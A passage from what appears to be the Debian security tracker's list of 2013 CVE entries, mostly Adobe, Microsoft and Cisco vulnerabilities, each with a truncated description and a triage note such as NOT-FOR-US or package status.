Shockwave Player CVE-2013-1382 REJECTED CVE-2013-1381 REJECTED CVE-2013-1380 (Adobe Flash Player before 10.3.183.75 and 11.x before 11.7.700.169 on ...) NOT-FOR-US: Adobe Flash Plugin CVE-2013-1379 (Adobe Flash Player before 10.3.183.75 and 11.x before 11.7.700.169 on ...) NOT-FOR-US: Adobe Flash Plugin CVE-2013-1378 (Adobe Flash Player before 10.3.183.75 and 11.x before 11.7.700.169 on ...) NOT-FOR-US: Adobe Flash Plugin CVE-2013-1377 (Adobe Digital Editions 2.x before 2.0.1 allows attackers to execute ar ...) NOT-FOR-US: Adobe Digital Editions CVE-2013-1376 (Buffer overflow in Adobe Reader and Acrobat 9.x before 9.5.3, 10.x bef ...) NOT-FOR-US: Adobe Reader CVE-2013-1375 (Heap-based buffer overflow in Adobe Flash Player before 10.3.183.68 an ...) NOT-FOR-US: Adobe Flash Plugin CVE-2013-1374 (Use-after-free vulnerability in Adobe Flash Player before 10.3.183.63 ...) NOT-FOR-US: Adobe Flash Plugin CVE-2013-1373 (Buffer overflow in Adobe Flash Player before 10.3.183.63 and 11.x befo ...) NOT-FOR-US: Adobe Flash Plugin CVE-2013-1372 (Buffer overflow in Adobe Flash Player before 10.3.183.63 and 11.x befo ...) NOT-FOR-US: Adobe Flash Plugin CVE-2013-1371 (Adobe Flash Player before 10.3.183.68 and 11.x before 11.6.602.180 on ...) NOT-FOR-US: Adobe Flash Plugin CVE-2013-1370 (Buffer overflow in Adobe Flash Player before 10.3.183.63 and 11.x befo ...) NOT-FOR-US: Adobe Flash Plugin CVE-2013-1369 (Buffer overflow in Adobe Flash Player before 10.3.183.63 and 11.x befo ...) NOT-FOR-US: Adobe Flash Plugin CVE-2013-1368 (Buffer overflow in Adobe Flash Player before 10.3.183.63 and 11.x befo ...) NOT-FOR-US: Adobe Flash Plugin CVE-2013-1367 (Buffer overflow in Adobe Flash Player before 10.3.183.63 and 11.x befo ...) NOT-FOR-US: Adobe Flash Plugin CVE-2013-1366 (Buffer overflow in Adobe Flash Player before 10.3.183.63 and 11.x befo ...) NOT-FOR-US: Adobe Flash Plugin CVE-2013-1365 (Buffer overflow in Adobe Flash Player before 10.3.183.63 and 11.x befo ...) NOT-FOR-US: Adobe Flash Plugin CVE-2013-1364 (The user.login function in Zabbix before 1.8.16 and 2.x before 2.0.5rc ...) - zabbix 1:2.0.4+dfsg-2 (bug #698541) [squeeze] - zabbix (Not supported in Squeeze LTS) NOTE: patches in https://support.zabbix.com/browse/ZBX-6097 CVE-2013-1363 RESERVED CVE-2013-1362 (Incomplete blacklist vulnerability in nrpc.c in Nagios Remote Plug-In ...) - nagios-nrpe 2.13-3 (low; bug #701227) [squeeze] - nagios-nrpe (Minor issue) CVE-2013-1361 (Untrusted search path vulnerability in Lenovo Thinkpad Bluetooth with ...) NOT-FOR-US: Lenovo Thinkpad Bluetooth with Enhanced Data Rate Software CVE-2013-1360 (An Authentication Bypass vulnerability exists in DELL SonicWALL Global ...) NOT-FOR-US: DELL SonicWALL Global Management System (GMS) CVE-2013-1359 (An Authentication Bypass Vulnerability exists in DELL SonicWALL Analyz ...) NOT-FOR-US: DELL SonicWALL CVE-2013-1358 RESERVED CVE-2013-1357 RESERVED CVE-2013-1356 RESERVED CVE-2013-1355 REJECTED CVE-2013-1354 RESERVED CVE-2013-1353 (Orange HRM 2.7.1 allows XSS via the vacancy name. ...) NOT-FOR-US: Orange HRM CVE-2013-1352 (Verax NMS prior to 2.1.0 uses an encryption key that is hardcoded in a ...) NOT-FOR-US: Verax NMS CVE-2013-1351 (Verax NMS prior to 2.10 allows authentication via the encrypted passwo ...) NOT-FOR-US: Verax NMS CVE-2013-1350 (Verax NMS prior to 2.1.0 has multiple security bypass vulnerabilities ...) NOT-FOR-US: Verax NMS CVE-2013-1349 (Eval injection vulnerability in ajax.php in openSIS 4.5 through 5.2 al ...) NOT-FOR-US: openSIS CVE-2013-1348 (The Yaml::parse function in Symfony 2.0.x before 2.0.22 remote attacke ...) - php-symfony2-yaml (Only affects version 2.0) CVE-2013-1347 (Microsoft Internet Explorer 8 does not properly handle objects in memo ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-1346 (mpengine.dll in Microsoft Malware Protection Engine before 1.1.9506.0 ...) NOT-FOR-US: Microsoft Malware Protection Engine CVE-2013-1345 (win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and ...) NOT-FOR-US: Microsoft CVE-2013-1344 (win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and ...) NOT-FOR-US: Microsoft Windows CVE-2013-1343 (win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and ...) NOT-FOR-US: Microsoft Windows CVE-2013-1342 (win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and ...) NOT-FOR-US: Microsoft Windows CVE-2013-1341 (win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and ...) NOT-FOR-US: Microsoft CVE-2013-1340 (win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and ...) NOT-FOR-US: Microsoft CVE-2013-1339 (The Print Spooler in Microsoft Windows Vista SP2, Windows Server 2008 ...) NOT-FOR-US: Microsoft CVE-2013-1338 (Use-after-free vulnerability in Microsoft Internet Explorer 6 through ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-1337 (Microsoft .NET Framework 4.5 does not properly create policy requireme ...) NOT-FOR-US: Microsoft .NET Framework 4.5 CVE-2013-1336 (The Common Language Runtime (CLR) in Microsoft .NET Framework 2.0 SP2, ...) NOT-FOR-US: Microsoft .NET Framework CVE-2013-1335 (Microsoft Word 2003 SP3 and Word Viewer allow remote attackers to exec ...) NOT-FOR-US: Microsoft Word CVE-2013-1334 (win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and ...) NOT-FOR-US: Microsoft Windows CVE-2013-1333 (Buffer overflow in win32k.sys in the kernel-mode drivers in Microsoft ...) NOT-FOR-US: Microsoft Windows CVE-2013-1332 (dxgkrnl.sys (aka the DirectX graphics kernel subsystem) in the kernel- ...) NOT-FOR-US: Microsoft Windows CVE-2013-1331 (Buffer overflow in Microsoft Office 2003 SP3 and Office 2011 for Mac a ...) NOT-FOR-US: Microsoft CVE-2013-1330 (The default configuration of Microsoft SharePoint Portal Server 2003 S ...) NOT-FOR-US: Microsoft SharePoint CVE-2013-1329 (Integer signedness error in Microsoft Publisher 2003 SP3 allows remote ...) NOT-FOR-US: Microsoft Publisher CVE-2013-1328 (Microsoft Publisher 2003 SP3, 2007 SP3, and 2010 SP1 allows remote att ...) NOT-FOR-US: Microsoft Publisher CVE-2013-1327 (Integer signedness error in Microsoft Publisher 2003 SP3 allows remote ...) NOT-FOR-US: Microsoft Publisher CVE-2013-1326 REJECTED CVE-2013-1325 (Heap-based buffer overflow in Microsoft Office 2003 SP3 and 2007 SP3 a ...) NOT-FOR-US: Microsoft CVE-2013-1324 (Stack-based buffer overflow in Microsoft Office 2003 SP3, 2007 SP3, 20 ...) NOT-FOR-US: Microsoft CVE-2013-1323 (Microsoft Publisher 2003 SP3 does not properly handle NULL values for ...) NOT-FOR-US: Microsoft Publisher CVE-2013-1322 (Microsoft Publisher 2003 SP3 does not properly check table range data, ...) NOT-FOR-US: Microsoft Publisher CVE-2013-1321 (Microsoft Publisher 2003 SP3 does not properly check the data type of ...) NOT-FOR-US: Microsoft Publisher CVE-2013-1320 (Buffer overflow in Microsoft Publisher 2003 SP3 allows remote attacker ...) NOT-FOR-US: Microsoft Publisher CVE-2013-1319 (Microsoft Publisher 2003 SP3 does not properly check the return value ...) NOT-FOR-US: Microsoft Publisher CVE-2013-1318 (Microsoft Publisher 2003 SP3 allows remote attackers to execute arbitr ...) NOT-FOR-US: Microsoft Publisher CVE-2013-1317 (Integer overflow in Microsoft Publisher 2003 SP3 allows remote attacke ...) NOT-FOR-US: Microsoft Publisher CVE-2013-1316 (Microsoft Publisher 2003 SP3 does not properly validate the size of an ...) NOT-FOR-US: Microsoft Publisher CVE-2013-1315 (Microsoft SharePoint Server 2007 SP3, 2010 SP1 and SP2, and 2013; Offi ...) NOT-FOR-US: Microsoft CVE-2013-1314 REJECTED CVE-2013-1313 (Object Linking and Embedding (OLE) Automation in Microsoft Windows XP ...) NOT-FOR-US: Microsoft Windows XP CVE-2013-1312 (Use-after-free vulnerability in Microsoft Internet Explorer 9 and 10 a ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-1311 (Use-after-free vulnerability in Microsoft Internet Explorer 8 allows r ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-1310 (Use-after-free vulnerability in Microsoft Internet Explorer 6 and 7 al ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-1309 (Use-after-free vulnerability in Microsoft Internet Explorer 6 through ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-1308 (Use-after-free vulnerability in Microsoft Internet Explorer 6 through ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-1307 (Use-after-free vulnerability in Microsoft Internet Explorer 8 and 9 al ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-1306 (Use-after-free vulnerability in Microsoft Internet Explorer 9 allows r ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-1305 (HTTP.sys in Microsoft Windows 8, Windows Server 2012, and Windows RT a ...) NOT-FOR-US: Microsoft CVE-2013-1304 (Use-after-free vulnerability in Microsoft Internet Explorer 6 through ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-1303 (Use-after-free vulnerability in Microsoft Internet Explorer 6 through ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-1302 (Microsoft Communicator 2007 R2, Lync 2010, Lync 2010 Attendee, and Lyn ...) NOT-FOR-US: Microsoft CVE-2013-1301 (Microsoft Visio 2003 SP3 2007 SP3, and 2010 SP1 allows remote attacker ...) NOT-FOR-US: Microsoft Visio CVE-2013-1300 (win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and ...) NOT-FOR-US: Microsoft CVE-2013-1299 (Microsoft Windows Modern Mail allows remote attackers to spoof link ta ...) NOT-FOR-US: Microsoft Windows Modern Mail CVE-2013-1298 REJECTED CVE-2013-1297 (Microsoft Internet Explorer 6 through 8 does not properly restrict dat ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-1296 (The Remote Desktop ActiveX control in mstscax.dll in Microsoft Remote ...) NOT-FOR-US: Microsoft Remote Desktop Connection Client CVE-2013-1295 (The Client/Server Run-time Subsystem (CSRSS) in Microsoft Windows XP S ...) NOT-FOR-US: Microsoft Windows CVE-2013-1294 (Race condition in the kernel in Microsoft Windows XP SP2 and SP3, Wind ...) NOT-FOR-US: Microsoft Windows CVE-2013-1293 (The NTFS kernel-mode driver in Microsoft Windows Vista SP2, Windows Se ...) NOT-FOR-US: Microsoft Windows CVE-2013-1292 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft W ...) NOT-FOR-US: Microsoft Windows CVE-2013-1291 (win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP3, Win ...) NOT-FOR-US: Microsoft Windows CVE-2013-1290 (Microsoft SharePoint Server 2013, in certain configurations involving ...) NOT-FOR-US: Microsoft SharePoint Server CVE-2013-1289 (Cross-site scripting (XSS) vulnerability in Microsoft SharePoint Serve ...) NOT-FOR-US: Microsoft SharePoint Server CVE-2013-1288 (Use-after-free vulnerability in Microsoft Internet Explorer 8 allows r ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-1287 (The USB kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windo ...) NOT-FOR-US: Microsoft Windows CVE-2013-1286 (The USB kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windo ...) NOT-FOR-US: Microsoft Windows CVE-2013-1285 (The USB kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windo ...) NOT-FOR-US: Microsoft Windows CVE-2013-1284 (Race condition in the kernel in Microsoft Windows 8, Windows Server 20 ...) NOT-FOR-US: Microsoft Windows CVE-2013-1283 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft W ...) NOT-FOR-US: Microsoft Windows CVE-2013-1282 (The LDAP service in Microsoft Active Directory, Active Directory Appli ...) NOT-FOR-US: Microsoft CVE-2013-1281 (The NFS server in Microsoft Windows Server 2008 R2 and R2 SP1 and Serv ...) NOT-FOR-US: Microsoft Windows CVE-2013-1280 (The kernel in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP ...) NOT-FOR-US: Microsoft Windows CVE-2013-1279 (Race condition in the kernel in Microsoft Windows XP SP2 and SP3, Wind ...) NOT-FOR-US: Microsoft Windows CVE-2013-1278 (Race condition in the kernel in Microsoft Windows XP SP2 and SP3, Wind ...) NOT-FOR-US: Microsoft Windows CVE-2013-1277 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft W ...) NOT-FOR-US: Microsoft Windows CVE-2013-1276 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft W ...) NOT-FOR-US: Microsoft Windows CVE-2013-1275 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft W ...) NOT-FOR-US: Microsoft Windows CVE-2013-1274 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft W ...) NOT-FOR-US: Microsoft Windows CVE-2013-1273 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft W ...) NOT-FOR-US: Microsoft Windows CVE-2013-1272 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft W ...) NOT-FOR-US: Microsoft Windows CVE-2013-1271 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft W ...) NOT-FOR-US: Microsoft Windows CVE-2013-1270 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft W ...) NOT-FOR-US: Microsoft Windows CVE-2013-1269 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft W ...) NOT-FOR-US: Microsoft Windows CVE-2013-1268 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft W ...) NOT-FOR-US: Microsoft Windows CVE-2013-1267 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft W ...) NOT-FOR-US: Microsoft Windows CVE-2013-1266 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft W ...) NOT-FOR-US: Microsoft Windows CVE-2013-1265 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft W ...) NOT-FOR-US: Microsoft Windows CVE-2013-1264 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft W ...) NOT-FOR-US: Microsoft Windows CVE-2013-1263 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft W ...) NOT-FOR-US: Microsoft Windows CVE-2013-1262 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft W ...) NOT-FOR-US: Microsoft Windows CVE-2013-1261 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft W ...) NOT-FOR-US: Microsoft Windows CVE-2013-1260 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft W ...) NOT-FOR-US: Microsoft Windows CVE-2013-1259 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft W ...) NOT-FOR-US: Microsoft Windows CVE-2013-1258 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft W ...) NOT-FOR-US: Microsoft Windows CVE-2013-1257 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft W ...) NOT-FOR-US: Microsoft Windows CVE-2013-1256 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft W ...) NOT-FOR-US: Microsoft Windows CVE-2013-1255 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft W ...) NOT-FOR-US: Microsoft Windows CVE-2013-1254 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft W ...) NOT-FOR-US: Microsoft Windows CVE-2013-1253 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft W ...) NOT-FOR-US: Microsoft Windows CVE-2013-1252 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft W ...) NOT-FOR-US: Microsoft Windows CVE-2013-1251 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft W ...) NOT-FOR-US: Microsoft Windows CVE-2013-1250 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft W ...) NOT-FOR-US: Microsoft Windows CVE-2013-1249 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft W ...) NOT-FOR-US: Microsoft Windows CVE-2013-1248 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft W ...) NOT-FOR-US: Microsoft Windows CVE-2013-1247 (Cross-site scripting (XSS) vulnerability in the wireless configuration ...) NOT-FOR-US: Cisco CVE-2013-1246 (Cisco TelePresence System Software does not properly handle inactive t ...) NOT-FOR-US: Cisco CVE-2013-1245 (The user-management page in Cisco WebEx Social relies on client-side v ...) NOT-FOR-US: Cisco WebEx Social CVE-2013-1244 (Cross-site scripting (XSS) vulnerability in the portal module in Cisco ...) NOT-FOR-US: Cisco WebEx Social CVE-2013-1243 (The IP stack in Cisco Intrusion Prevention System (IPS) Software in AS ...) NOT-FOR-US: Cisco CVE-2013-1242 (Memory leak in the web framework in the server in Cisco Unified Presen ...) NOT-FOR-US: Cisco CVE-2013-1241 (The ISM module in Cisco IOS on ISR G2 routers does not properly handle ...) NOT-FOR-US: Cisco IOS CVE-2013-1240 (The command-line interface in Cisco Unified Communications Manager (CU ...) NOT-FOR-US: Cisco Unified Communications Manager CVE-2013-1239 RESERVED CVE-2013-1238 RESERVED CVE-2013-1237 RESERVED CVE-2013-1236 (Cisco TelePresence Supervisor MSE 8050 before 2.3(1.31) allows remote ...) NOT-FOR-US: Cisco TelePresence Supervisor CVE-2013-1235 (Cisco Wireless LAN Controller (WLC) devices do not properly address th ...) NOT-FOR-US: Cisco Wireless LAN Controller CVE-2013-1234 (The SNMP module in Cisco IOS XR allows remote authenticated users to c ...) NOT-FOR-US: Cisco IOS XR CVE-2013-1233 REJECTED CVE-2013-1232 (The HTTP implementation in Cisco WebEx Node for MCS, WebEx Meetings Se ...) NOT-FOR-US: Cisco WebEx CVE-2013-1231 (The HTTP implementation in Cisco WebEx Node for MCS and WebEx Meetings ...) NOT-FOR-US: Cisco WebEx CVE-2013-1230 (Cisco Unified Communications Domain Manager allows remote attackers to ...) NOT-FOR-US: Cisco CVE-2013-1229 (TMSSNMPService.exe in TelePresence Manager in Cisco TelePresence Manag ...) NOT-FOR-US: Cisco CVE-2013-1228 (Cisco Jabber on Windows does not verify X.509 certificates from SSL se ...) NOT-FOR-US: Cisco Jabber CVE-2013-1227 (Cross-site scripting (XSS) vulnerability in the web framework in Cisco ...) NOT-FOR-US: Cisco Unified Communications Domain Manager CVE-2013-1226 (The Ethernet frame-forwarding implementation in Cisco NX-OS on Nexus 7 ...) NOT-FOR-US: Cisco NX-OS CVE-2013-1225 (Cisco Unified Customer Voice Portal (CVP) Software before 9.0.1 ES 11 ...) NOT-FOR-US: Cisco Unified Customer Voice Portal CVE-2013-1224 (Directory traversal vulnerability in the Resource Manager in Cisco Uni ...) NOT-FOR-US: Cisco Unified Customer Voice Portal CVE-2013-1223 (The log viewer in Cisco Unified Customer Voice Portal (CVP) Software b ...) NOT-FOR-US: Cisco Unified Customer Voice Portal CVE-2013-1222 (The Tomcat Web Management feature in Cisco Unified Customer Voice Port ...) NOT-FOR-US: Cisco Unified Customer Voice Portal CVE-2013-1221 (The Tomcat Web Management feature in Cisco Unified Customer Voice Port ...) NOT-FOR-US: Cisco Unified Customer Voice Portal CVE-2013-1220 (The CallServer component in Cisco Unified Customer Voice Portal (CVP) ...) NOT-FOR-US: Cisco Unified Customer Voice Portal CVE-2013-1219 (SensorApp in Cisco Intrusion Prevention System (IPS) allows local user ...) NOT-FOR-US: Cisco Intrusion Prevention System CVE-2013-1218 (Cisco Intrusion Prevention System (IPS) Software in ASA 5500-X IPS-SSP ...) NOT-FOR-US: Cisco CVE-2013-1217 (The generic input/output control implementation in Cisco IOS does not ...) NOT-FOR-US: Cisco IOS CVE-2013-1216 (Memory leak in the SNMP module in Cisco IOS XR allows remote authentic ...) NOT-FOR-US: Cisco IOS XR CVE-2013-1215 (The vpnclient program in the Easy VPN component on Cisco Adaptive Secu ...) NOT-FOR-US: Cisco CVE-2013-1214 (The scripts editor in Cisco Unified Contact Center Express (aka Unifie ...) NOT-FOR-US: Cisco Unified Contact Center Express CVE-2013-1213 (Cisco NX-OS on the Nexus 1000V does not assign the proper priority to ...) NOT-FOR-US: Cisco CVE-2013-1212 (The SSL functionality in Cisco NX-OS on the Nexus 1000V does not prope ...) NOT-FOR-US: Cisco CVE-2013-1211 (Cisco NX-OS on the Nexus 1000V does not properly handle authentication ...) NOT-FOR-US: Cisco CVE-2013-1210 (Array index error in the Virtual Ethernet Module (VEM) kernel driver f ...) NOT-FOR-US: Cisco CVE-2013-1209 (The encryption functionality in the Virtual Supervisor Module (VSM) to ...) NOT-FOR-US: Cisco CVE-2013-1208 (The encryption functionality in Cisco NX-OS on the Nexus 1000V does no ...) NOT-FOR-US: Cisco CVE-2013-1207 RESERVED CVE-2013-1206 RESERVED CVE-2013-1205 (The Event Center module in Cisco WebEx Meetings Server does not perfor ...) NOT-FOR-US: Cisco WebEx Meetings Server CVE-2013-1204 (Memory leak in the SNMP process in Cisco IOS XR allows remote attacker ...) NOT-FOR-US: Cisco IOS XR CVE-2013-1203 (Cisco ASA CX Context-Aware Security Software allows remote attackers t ...) NOT-FOR-US: Cisco ASA CVE-2013-1202 (Cisco ACE A2(3.6) allows log retention DoS. ...) NOT-FOR-US: Cisco CVE-2013-1201 RESERVED CVE-2013-1200 (Session fixation vulnerability in Cisco Secure Access Control System ( ...) NOT-FOR-US: Cisco Secure Access Control System CVE-2013-1199 (Race condition in the CIFS implementation in the rewriter module in th ...) NOT-FOR-US: Cisco CVE-2013-1198 (Cross-site scripting (XSS) vulnerability in a Flash component in Cisco ...) NOT-FOR-US: Cisco Unified Computing System CVE-2013-1197 (The XML parser in the server in Cisco Unified Presence (CUP) allows re ...) NOT-FOR-US: Cisco Unified Presence CVE-2013-1196 (The command-line interface in Cisco Secure Access Control System (ACS) ...) NOT-FOR-US: Cisco CVE-2013-1195 (The time-based ACL implementation on Cisco Adaptive Security Appliance ...) NOT-FOR-US: isco Adaptive Security Appliances CVE-2013-1194 (The ISAKMP implementation on Cisco Adaptive Security Appliances (ASA) ...) NOT-FOR-US: Cisco CVE-2013-1193 (The Secure Shell (SSH) implementation on Cisco Adaptive Security Appli ...) NOT-FOR-US: Cisco CVE-2013-1192 (The JAR files on Cisco Device Manager for Cisco MDS 9000 devices befor ...) NOT-FOR-US: Cisco Device Manager CVE-2013-1191 (Cisco NX-OS 6.1 before 6.1(5) on Nexus 7000 devices, when local authen ...) NOT-FOR-US: Cisco CVE-2013-1190 (The C-Series Rack Server component 1.4 in Cisco Unified Computing Syst ...) NOT-FOR-US: Cisco CVE-2013-1189 (Cisco Universal Broadband (aka uBR) 10000 series routers, when an IPv4 ...) NOT-FOR-US: Cisco Universal Broadband 10000 series routers CVE-2013-1188 (Cisco Unified Communications Manager (CUCM) does not properly limit th ...) NOT-FOR-US: Cisco Unified Communications Manager CVE-2013-1187 (The Connection Manager in Cisco Jabber Extensible Communications Platf ...) NOT-FOR-US: Cisco CVE-2013-1186 (Cisco Unified Computing System (UCS) 1.x before 1.4(4) and 2.x before ...) NOT-FOR-US: Cisco Unified Computing System CVE-2013-1185 (The web interface in the Manager component in Cisco Unified Computing ...) NOT-FOR-US: Cisco Unified Computing System CVE-2013-1184 (The management API in the XML API management service in the Manager co ...) NOT-FOR-US: Cisco Unified Computing System CVE-2013-1183 (Buffer overflow in the Intelligent Platform Management Interface (IPMI ...) NOT-FOR-US: Cisco Unified Computing System CVE-2013-1182 (The login page in the Web Console in the Manager component in Cisco Un ...) NOT-FOR-US: Cisco Unified Computing System CVE-2013-1181 (Cisco NX-OS on Nexus 5500 devices 4.x and 5.x before 5.0(3)N2(2), Nexu ...) NOT-FOR-US: Cisco CVE-2013-1180 (Buffer overflow in the SNMP implementation in Cisco NX-OS on Nexus 700 ...) NOT-FOR-US: Cisco NX-OS CVE-2013-1179 (Multiple buffer overflows in the (1) SNMP and (2) License Manager impl ...) NOT-FOR-US: Cisco NX-OS CVE-2013-1178 (Multiple buffer overflows in the Cisco Discovery Protocol (CDP) implem ...) NOT-FOR-US: Cisco NX-OS CVE-2013-1177 (SQL injection vulnerability in Cisco Network Admission Control (NAC) M ...) NOT-FOR-US: Cisco Network Admission Control Manager CVE-2013-1176 (The DSP card on Cisco TelePresence MCU 4500 and 4501 devices before 4. ...) NOT-FOR-US: Cisco CVE-2013-1175 REJECTED CVE-2013-1174 (Cisco Tivoli Business Service Manager (TBSM) in Hosted Collaboration M ...) NOT-FOR-US: Cisco Tivoli Business Service Manager CVE-2013-1173 (Heap-based buffer overflow in ciscod.exe in the Cisco Security Service ...) NOT-FOR-US: Cisco AnyConnect CVE-2013-1172 (The Cisco Security Service in Cisco AnyConnect Secure Mobility Client ...) NOT-FOR-US: Cisco AnyConnect CVE-2013-1171 (Multiple cross-site scripting (XSS) vulnerabilities in the element-lis ...) NOT-FOR-US: Cisco Connected Grid Network Management System (CG-NMS) CVE-2013-1170 (The Cisco Prime Network Control System (NCS) appliance with software b ...) NOT-FOR-US: Cisco Prime Network Control System CVE-2013-1169 (Cisco Unified MeetingPlace Web Conferencing Server 7.x before 7.1MR1 P ...) NOT-FOR-US: Cisco Unified MeetingPlace Web Conferencing Server CVE-2013-1168 (The web server in Cisco Unified MeetingPlace Application Server 7.x be ...) NOT-FOR-US: Cisco Unified MeetingPlace Application Server CVE-2013-1167 (Cisco IOS XE 3.2 through 3.4 before 3.4.2S, and 3.5, on 1000 series Ag ...) NOT-FOR-US: Cisco IOS XE CVE-2013-1166 (Cisco IOS XE 3.2 through 3.4 before 3.4.5S, and 3.5 through 3.7 before ...) NOT-FOR-US: Cisco IOS XE CVE-2013-1165 (Cisco IOS XE 2.x and 3.x before 3.4.5S, and 3.5 through 3.7 before 3.7 ...) NOT-FOR-US: Cisco IOS XE CVE-2013-1164 (Cisco IOS XE 3.4 before 3.4.4S, 3.5, and 3.6 on 1000 series Aggregatio ...) NOT-FOR-US: Cisco IOS XE CVE-2013-1163 (Multiple SQL injection vulnerabilities in the device-management implem ...) NOT-FOR-US: Cisco CVE-2013-1162 (The traffic engineering (TE) processing subsystem in Cisco IOS XR allo ...) NOT-FOR-US: Cisco CVE-2013-1161 (The XML parser in the Cisco Jabber IM application for Android allows r ...) NOT-FOR-US: Cisco CVE-2013-1160 (Cross-site scripting (XSS) vulnerability in the OpenView web menus in ...) NOT-FOR-US: Cisco CVE-2013-1159 (Cross-site scripting (XSS) vulnerability in the Netcool Impact (NCI) w ...) NOT-FOR-US: Cisco CVE-2013-1158 (Cross-site scripting (XSS) vulnerability in the IBM Tivoli Monitoring ...) NOT-FOR-US: IBM CVE-2013-1157 (Cross-site scripting (XSS) vulnerability in the IBM Tivoli Monitoring ...) NOT-FOR-US: IBM CVE-2013-1156 (Directory traversal vulnerability in Cisco Prime Central for Hosted Co ...) NOT-FOR-US: Cisco CVE-2013-1155 (The auth-proxy functionality in Cisco Firewall Services Module (FWSM) ...) NOT-FOR-US: Cisco Firewall Services Module CVE-2013-1154 (The Cisco Small Business 200 Series Smart Switch 1.2.7.76 and earlier, ...) NOT-FOR-US: Cisco Small Business switches CVE-2013-1153 (Cross-site request forgery (CSRF) vulnerability in the web interface i ...) NOT-FOR-US: Cisco Prime Infrastructure CVE-2013-1152 (Cisco Adaptive Security Appliances (ASA) devices with software 9.0 bef ...) NOT-FOR-US: Cisco Adaptive Security Appliances CVE-2013-1151 (Cisco Adaptive Security Appliances (ASA) devices with software 7.x bef ...) NOT-FOR-US: Cisco Adaptive Security Appliances CVE-2013-1150 (The authentication-proxy implementation on Cisco Adaptive Security App ...) NOT-FOR-US: Cisco Adaptive Security Appliances CVE-2013-1149 (Cisco Adaptive Security Appliances (ASA) devices with software 7.x bef ...) NOT-FOR-US: Cisco Adaptive Security Appliances CVE-2013-1148 (The General Responder implementation in the IP Service Level Agreement ...) NOT-FOR-US: Cisco IOS CVE-2013-1147 (The Protocol Translation (PT) functionality in Cisco IOS 12.3 through ...) NOT-FOR-US: Cisco IOS CVE-2013-1146 (The Smart Install client functionality in Cisco IOS 12.2 and 15.0 thro ...) NOT-FOR-US: Cisco IOS CVE-2013-1145 (Memory leak in Cisco IOS 12.2, 12.4, 15.0, and 15.1, when Zone-Based P ...) NOT-FOR-US: Cisco IOS CVE-2013-1144 (Memory leak in the IKEv1 implementation in Cisco IOS 15.1 allows remot ...) NOT-FOR-US: Cisco IOS CVE-2013-1143 (The RSVP protocol implementation in Cisco IOS 12.2 and 15.0 through 15 ...) NOT-FOR-US: Cisco IOS CVE-2013-1142 (Race condition in the VRF-aware NAT feature in Cisco IOS 12.2 through ...) NOT-FOR-US: Cisco IOS CVE-2013-1141 (The mDNS snooping functionality on Cisco Wireless LAN Controller (WLC) ...) NOT-FOR-US: Cisco Wireless LAN Controller CVE-2013-1140 (The XML parser in Cisco Security Monitoring, Analysis, and Response Sy ...) NOT-FOR-US: Cisco Security MARS CVE-2013-1139 (The nsAPI interface in Cisco Cloud Portal 9.1 SP1 and SP2, and 9.3 thr ...) NOT-FOR-US: Cisco Cloud Portal CVE-2013-1138 (The NAT process on Cisco Adaptive Security Appliances (ASA) devices al ...) NOT-FOR-US: Cisco CVE-2013-1137 (Cisco Unified Presence Server (CUPS) 8.6, 9.0, and 9.1 before 9.1.1 al ...) NOT-FOR-US: Cisco Unified Presence Server CVE-2013-1136 (The crypto engine process in Cisco IOS on Aggregation Services Router ...) NOT-FOR-US: Cisco IOS CVE-2013-1135 (Cisco Prime Central for Hosted Collaboration Solution (HCS) Assurance ...) NOT-FOR-US: Cisco Prime Central CVE-2013-1134 (The Location Bandwidth Manager (LBM) 